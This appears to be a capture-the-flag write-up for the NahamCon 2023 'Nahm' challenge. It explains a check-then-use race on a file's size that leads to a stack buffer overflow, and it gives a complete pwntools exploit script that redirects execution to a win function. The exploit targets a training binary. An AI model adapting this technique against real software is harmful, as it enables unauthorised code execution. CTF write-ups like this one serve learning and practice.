Home Nahm , NahamCon 2023
Post
Cancel

Nahm , NahamCon 2023

Posted Jun 18, 2023 Updated Jun 19, 2023
By Abdullah Shahbaz
2 min read

Description :

The program is designed to work with a specific file. First, it prompts the user to enter the name of the file. If the file name matches the keyword “flag,” the program terminates immediately. Otherwise, it proceeds to check the properties of the file. If the file is a symlink, an error is thrown indicating that it is a symlink file.

Next, the program verifies if the file size is less than 81 bytes. If the file size meets this condition, the program waits for user input. Once the user provides input, a function is executed to open the file and copy 4096 bytes into a buffer of 80 bytes, creating a potential buffer overflow situation.

To exploit this vulnerability, you can create a file with a size less than 80 bytes and wait until the program prompts for user input. At this point, you can add exploit code to the file, making sure it exceeds 80 bytes. Since no further checks are performed, the exploit code can grant you shell access.

Vulnerable Code

vuln_1 img_1 img_1 img_1 img_1

Protection

img_1

Exploit:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57

#!/usr/bin/python3
from pwn import *
import struct

# Set the log level to control the verbosity of logs
context.log_level = 'error'

# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)


# Specify GDB script here (breakpoints etc)
gdbscript = '''
break *vuln+109
continue
'''.format(**locals())

# Define the path to the binary
exe = './bin'
elf = context.binary = ELF(exe, checksec=False)

# Create a payload for the exploit
payload = b""
payload += b"A"*80

# Write the payload to a file (function definition not provided)
write("1", payload)

# Start the process
io = start()

# Define the file path to send to the target binary
file_path = b"1"  # For remote server, use "/tmp/1"

# Send the file path to the target binary
io.sendlineafter(b"Enter file: ", file_path)

# Create another payload for the exploit
payload = b""
payload += b"A"*104
payload += p64(elf.sym.winning_function)

# Write the payload to a file
write("1", payload)  # For remote servers, use "/tmp/1" due to write permission in the home folder

# Send a newline character to the target binary
io.sendline()

# Switch to interactive mode to interact with the exploited binary
io.interactive()
Pwn, amd64, ctf
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents